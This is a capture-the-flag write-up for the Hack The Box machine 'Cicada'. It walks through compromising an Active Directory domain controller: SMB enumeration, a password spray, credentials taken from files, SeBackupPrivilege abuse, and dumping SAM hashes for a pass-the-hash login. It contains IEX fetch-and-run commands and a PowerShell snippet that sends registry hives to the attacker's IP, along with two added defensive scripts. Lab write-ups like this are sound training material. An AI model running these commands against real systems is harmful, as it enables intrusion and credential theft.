Cicada

Recon

[embedded: nmap_scan.log (scan output not rendered)]

SMB

└─$ netexec smb 10.129.52.9 -u 'guest' -p '' --shares
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.129.52.9     445    CICADA-DC        [*] Enumerated shares
SMB         10.129.52.9     445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.52.9     445    CICADA-DC        -----           -----------     ------
SMB         10.129.52.9     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.52.9     445    CICADA-DC        C$                              Default share
SMB         10.129.52.9     445    CICADA-DC        DEV
SMB         10.129.52.9     445    CICADA-DC        HR              READ
SMB         10.129.52.9     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.52.9     445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.129.52.9     445    CICADA-DC        SYSVOL                          Logon server share

Guest

Creds: guest:<BLANK>

└─$ smbclient -U 'cicada.htb\\guest' //10.129.52.9/HR
Password for [guest]: # blank, just press Enter
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

                4168447 blocks of size 4096. 267725 blocks available
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (4.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)
└─$ cat Notice\ from\ HR.txt
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Password Spray

└─$ netexec smb 10.129.52.9 -u 'guest' -p '' --rid-brute | tee rid-brute.log
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.129.52.9     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.52.9     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.52.9     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.52.9     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
└─$ grep 'User' rid-brute.log | awk '{print($6)}' > users.txt
└─$ netexec smb 10.129.52.9 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [+] CICADA\Domain:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.52.9     445    CICADA-DC        [+] CICADA\Protected:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.52.9     445    CICADA-DC        [-] CICADA\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

Creds: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
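Added example, not from the original writeup: the spray above leaves a distinctive trace on the domain controller, a burst of logon failures (event 4625) for many different accounts from one source, as opposed to a brute force, which hammers one account. The script below runs that check over constructed sample log lines (field names follow the 4625 event; the source IP, timestamps and usernames are made up to match this box) and flags any source that fails against at least five distinct accounts within five minutes.

```python
"""Spot a password spray in Windows logon-failure events (added example, not
from the original writeup). A spray shows up as many DIFFERENT target accounts
failing from one source inside a short window; a brute force is one account."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample modelled on the spray above: one source, one password,
# many accounts, a single success (4624) for michael.wrightson in the same burst.
SAMPLE_LOG = """\
2024-09-28T15:20:01 EventID=4625 TargetUserName=Administrator IpAddress=10.10.14.58 Status=0xC000006D
2024-09-28T15:20:01 EventID=4625 TargetUserName=Guest IpAddress=10.10.14.58 Status=0xC000006D
2024-09-28T15:20:02 EventID=4625 TargetUserName=krbtgt IpAddress=10.10.14.58 Status=0xC000006D
2024-09-28T15:20:02 EventID=4625 TargetUserName=john.smoulder IpAddress=10.10.14.58 Status=0xC000006D
2024-09-28T15:20:03 EventID=4625 TargetUserName=sarah.dantelia IpAddress=10.10.14.58 Status=0xC000006D
2024-09-28T15:20:03 EventID=4624 TargetUserName=michael.wrightson IpAddress=10.10.14.58 Status=0x0
2024-09-28T15:20:04 EventID=4625 TargetUserName=david.orelious IpAddress=10.10.14.58 Status=0xC000006D
2024-09-28T15:20:04 EventID=4625 TargetUserName=emily.oscars IpAddress=10.10.14.58 Status=0xC000006D
2024-09-28T15:40:00 EventID=4625 TargetUserName=emily.oscars IpAddress=10.10.14.77 Status=0xC000006D
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) TargetUserName=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+) Status=(?P<status>\S+)$"
)


def parse_events(text):
    """Yield (timestamp, event_id, user, ip) for every well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), int(m["eid"]), m["user"], m["ip"]


def find_sprays(text, window=timedelta(minutes=5), min_users=5):
    """Map source IP -> sorted distinct accounts for every source whose 4625
    failures cover at least `min_users` accounts within some `window`."""
    failures = defaultdict(list)  # ip -> [(timestamp, user), ...]
    for ts, eid, user, ip in parse_events(text):
        if eid == 4625:
            failures[ip].append((ts, user))
    hits = {}
    for ip, events in failures.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits


if __name__ == "__main__":
    for ip, users in find_sprays(SAMPLE_LOG).items():
        print(f"possible spray from {ip}: {len(users)} accounts {users}")
```

The lone failure from 10.10.14.77 is below the threshold and is not reported; the 4624 success for michael.wrightson inside the flagged burst is the account to review first.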

LDAP Enumeration (michael.wrightson)

Active Directory Enumeration with Mastertul

Cicada-Mastertul

└─$ py cicada-mastertul.py --setup
└─$ py cicada-mastertul.py -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb -t 10.129.52.9 --full
[screenshot: Writeup.png]

Creds: david.orelious:aRt$Lp#7t*VQ!3

david.orelious

└─$ netexec smb 10.129.52.9 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.129.52.9     445    CICADA-DC        [*] Enumerated shares
SMB         10.129.52.9     445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.52.9     445    CICADA-DC        -----           -----------     ------
SMB         10.129.52.9     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.52.9     445    CICADA-DC        C$                              Default share
SMB         10.129.52.9     445    CICADA-DC        DEV             READ
SMB         10.129.52.9     445    CICADA-DC        HR              READ
SMB         10.129.52.9     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.52.9     445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.129.52.9     445    CICADA-DC        SYSVOL          READ            Logon server share
└─$ smbclient -U 'cicada.htb\\david.orelious%aRt$Lp#7t*VQ!3' //10.129.52.9/DEV
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 08:31:39 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024

                4168447 blocks of size 4096. 267229 blocks available
smb: \> mget *
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> exit

emily.oscars

└─$ cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
└─$ netexec smb 10.129.52.9 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --shares
SMB         10.129.52.9     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.9     445    CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
SMB         10.129.52.9     445    CICADA-DC        [*] Enumerated shares
SMB         10.129.52.9     445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.52.9     445    CICADA-DC        -----           -----------     ------
SMB         10.129.52.9     445    CICADA-DC        ADMIN$          READ            Remote Admin
SMB         10.129.52.9     445    CICADA-DC        C$              READ,WRITE      Default share
SMB         10.129.52.9     445    CICADA-DC        DEV
SMB         10.129.52.9     445    CICADA-DC        HR              READ
SMB         10.129.52.9     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.52.9     445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.129.52.9     445    CICADA-DC        SYSVOL          READ            Logon server share

Creds: emily.oscars:Q!3@Lp#M6b*7t*Vt

User.txt

└─$ evil-winrm -i 10.129.52.9 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> cat Desktop/user.txt
5d06034ac3b70457a11097d99e13d7f7

Privilege Escalation

└─$ bloodhound-python -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -c all -op emily --zip -d cicada.htb -ns 10.129.52.9
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20240928153115_bloodhound.zip

Nothing much of value, except that we are a member of the Backup Operators group.

[screenshot: Writeup-1.png]

She's the only user that has a home directory.

*Evil-WinRM* PS C:\> ls Users
    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         8/26/2024   1:10 PM                Administrator
d-----         8/22/2024   2:22 PM                emily.oscars.CICADA
d-r---         3/14/2024   3:45 AM                Public

Nothing interesting...

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\AppData\Local\Temp> IEX(IWR http://10.10.14.58/adPEAS.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\AppData\Local\Temp> Invoke-adPEAS

SeBackupPrivilege

Check whoami

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> whoami /all
 
User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeBackupPrivilege looks interesting.
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#local-attack

└─$ curl -LOq https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/refs/heads/master/Privesc/Acl-FullControl.ps1
---
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> IEX(IWR http://10.10.14.58/Acl-FullControl.ps1 -UseBasicParsing)
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> Acl-FullControl -user 'CICADA.HTB\emily.oscars.CICADA' -path 'C:\Users\Administrator\Desktop'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> get-acl * | fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner  : BUILTIN\Administrators
Group  : CICADA\Domain Users
Access : CICADA\Administrator Allow  FullControl
         CICADA\emily.oscars Deny  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         CICADA\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:DUD:AI(A;;FA;;;LA)(D;ID;FA;;;S-1-5-21-917908876-1423158569-3159038727-1601)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)

Acl-FullControl fails to grant access, most probably because of the Deny entry for emily.oscars in the ACL above.
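Added example, not from the original writeup: the Sddl line above is the compact form of the same ACL, and decoding it makes the reason visible. The script parses the DACL ACEs, expands the two-letter SID abbreviations (BA, SY, LA, DU are well-known SDDL aliases) and lists the entries that name emily.oscars' SID, the RID-1601 SID that whoami /all printed earlier.

```python
"""Decode the DACL from the Sddl line get-acl printed for root.txt (added
example, not from the original writeup) and show which entries hit emily."""
import re

# Copied from the get-acl output above; EMILY_SID is the SID from whoami /all.
SDDL = ("O:BAG:DUD:AI(A;;FA;;;LA)(D;ID;FA;;;S-1-5-21-917908876-1423158569-3159038727-1601)"
        "(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)")
EMILY_SID = "S-1-5-21-917908876-1423158569-3159038727-1601"

# Well-known SDDL abbreviations (LA and DU are relative to the domain SID).
ALIASES = {"BA": "BUILTIN\\Administrators", "SY": "NT AUTHORITY\\SYSTEM",
           "LA": "<domain>\\Administrator (RID 500)", "DU": "<domain>\\Domain Users"}
ACE_TYPES = {"A": "Allow", "D": "Deny"}
RIGHTS = {"FA": "FullControl", "FR": "Read", "FW": "Write", "FX": "Execute"}

DACL_RE = re.compile(r"D:(?P<flags>[A-Z]*)(?P<aces>(?:\([^)]*\))+)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl):
    """Return one dict per ACE, in the order Windows stores (and evaluates) them."""
    m = DACL_RE.search(sddl)
    if not m:
        raise ValueError("no DACL in SDDL string")
    aces = []
    for body in ACE_RE.findall(m["aces"]):
        ace_type, flags, rights, _obj, _inh_obj, sid = body.split(";")
        aces.append({
            "type": ACE_TYPES.get(ace_type, ace_type),
            "inherited": "ID" in flags,       # ID flag = inherited from parent
            "rights": RIGHTS.get(rights, rights),
            "principal": ALIASES.get(sid, sid),
            "sid": sid,
        })
    return aces


def aces_for(sddl, sid):
    """ACEs whose trustee is exactly `sid` (group membership is not expanded)."""
    return [a for a in parse_dacl(sddl) if a["sid"] == sid]


if __name__ == "__main__":
    for ace in parse_dacl(SDDL):
        origin = "inherited" if ace["inherited"] else "explicit"
        print(f"{ace['type']:5} {ace['rights']:12} {origin:9} {ace['principal']}")
    hits = [(a["type"], a["rights"]) for a in aces_for(SDDL, EMILY_SID)]
    print("entries naming emily.oscars:", hits)   # [('Deny', 'FullControl')]
```

Windows walks the DACL in order, explicit ACEs before inherited ones and Deny before Allow within each class; the only explicit ACE here is the Allow for Administrator, so the inherited Deny is the first entry that matches emily's token and the read is refused.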

https://github.com/giuliano108/SeBackupPrivilege/tree/master

Root.txt

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> IWR http://10.10.14.58/SeBackupPrivilegeCmdLets.dll -out SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> IWR http://10.10.14.58/SeBackupPrivilegeUtils.dll -out SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Copy-FileSeBackupPrivilege /Users/Administrator/Desktop/root.txt flag.txt -Overwrite

Hashdump

└─$ listen 4444 > sam.save
└─$ listen 4445 > system.save
---
reg save hklm\sam sam.save
reg save hklm\system system.save

$server = "10.10.14.58"; $port = 4444; 
$filePath = "C:\Users\emily.oscars.CICADA\Documents\t\sam.save"; $tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port); $networkStream = $tcpClient.GetStream(); $fileBytes = [System.IO.File]::ReadAllBytes($filePath); $networkStream.Write($fileBytes, 0, $fileBytes.Length); $networkStream.Flush(); $networkStream.Close(); $tcpClient.Close()
$port = 4445;
$filePath = "C:\Users\emily.oscars.CICADA\Documents\t\system.save"; $tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port); $networkStream = $tcpClient.GetStream(); $fileBytes = [System.IO.File]::ReadAllBytes($filePath); $networkStream.Write($fileBytes, 0, $fileBytes.Length); $networkStream.Flush(); $networkStream.Close(); $tcpClient.Close()
---
└─$ impacket-secretsdump -sam sam.save -system system.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Creds: Administrator:2b87e7c93a3e8a0ea4a581937016f341

└─$ evil-winrm -i 10.129.52.9 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
3ffea962422f28b012d9e50c17404518

[screenshot: Writeup-2.png]
robocopy /b C:\Users\Administrator\Desktop C:\programdata root.txt

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy

Good resource: https://kb.offsec.nl/tools/techniques/backupoperatortoda/

From Dark_Man again:

Similar project: https://github.com/improsec/BackupOperatorToolkit

Note: The Administrator account in the SAM is a local account and its hash is different from the domain admin hash. To be able to use this local account, you must enable DSRM logon by modifying the registry key. On this machine the two are the same, but that is not always the case.
